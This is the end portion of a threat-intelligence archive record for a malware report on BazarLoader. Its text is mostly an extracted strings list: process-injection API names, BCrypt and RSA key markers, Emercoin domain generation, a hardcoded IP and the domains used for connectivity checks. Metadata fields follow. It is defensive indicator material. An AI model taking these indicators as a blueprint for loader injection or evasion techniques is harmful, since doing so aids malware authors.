backdoor\r\nyahoo.com\r\ngoogle.com\r\namazon.com\r\nmicrosoft.com\r\nmsdn.microsoft.com\r\nintel.com\r\nhp.com\r\nhpe.com\r\napple.com\r\nwhitehouse.gov\r\nInitializeProcThreadAttributeList\r\nntdll.dl\r\nNtGetContextThread\r\nNtSetContextThread\r\nNtResumeThread\r\n(byt\r\nGetDateFormatA\r\nGetTimeFormatA\r\nCrypt32.dll\r\nCryptDecodeObjectEx\r\nCryptDecodeObject\r\nBcrypt.dll\r\nBCryptGetProperty\r\nBCryptDestroyHash\r\nBCryptHashData\r\nBCryptSignHash\r\nBCryptImportKeyPair\r\nBCryptEncrypt\r\nBCryptDecrypt\r\n-----BEGIN RSA PRIVATE KEY-----\r\n-END RSA PRIVATE KEYG\r\nRSAFULLPRIVATEBLOB\r\nBlockLength\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 12 of 13\n\nSHA384\r\nSHA384\r\nhardcoded Emercoin\r\ngenerate Emercoin\r\nGetFullPathNameA\r\nt write data\r\nyu+file\r\nyu+path = [\r\nZbtdll.dll\r\nrinal\r\n/ll32.exe\r\ntimeout\r\n192.0.2.\r\n-w 1000\r\nGetFileAttributesExA\r\n%public%\r\n@n\"Y\r\nEie:\r\nBCryptFreeBuffer\r\nBCryptAddContextFunction\r\nTLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\r\nTLS_RSA_WITH_AES_256_CBC_SHA\r\nTLS_RSA_WITH_AES_128_CBC_SHA\r\n.dll\r\nadvapi32.dll\r\nnss3.dll\r\n_x64\r\nl3dGr_uWs_p9m55s\r\nm4s5c33p\r\na98h0i3s\r\na11m987w\r\n.exe\r\n5.255.103.36\r\n /f\r\n/vr32.exe\r\nsvch\r\nsvch/\r\nel32.dll\r\n|ll32\r\nlive.com(\r\neset.com\r\nfortinet.com\r\nvanguard.com\r\nkernel32.dll\r\nkernel32.dll\r\nBCryptCreateHash\r\nBCryptFinishHash\r\nBCryptDestroyKey\r\nhardcoded IP\r\nSource: https://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://malwarebookreports.com/bazarloader-back-from-holiday-break/"
	],
	"report_names": [
		"bazarloader-back-from-holiday-break"
	],
	"threat_actors": [],
	"ts_created_at": 1775434923,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/217f4616d960481d37a3497d97c4bda5a5bff598.pdf",
		"text": "https://archive.orkl.eu/217f4616d960481d37a3497d97c4bda5a5bff598.txt",
		"img": "https://archive.orkl.eu/217f4616d960481d37a3497d97c4bda5a5bff598.jpg"
	}
}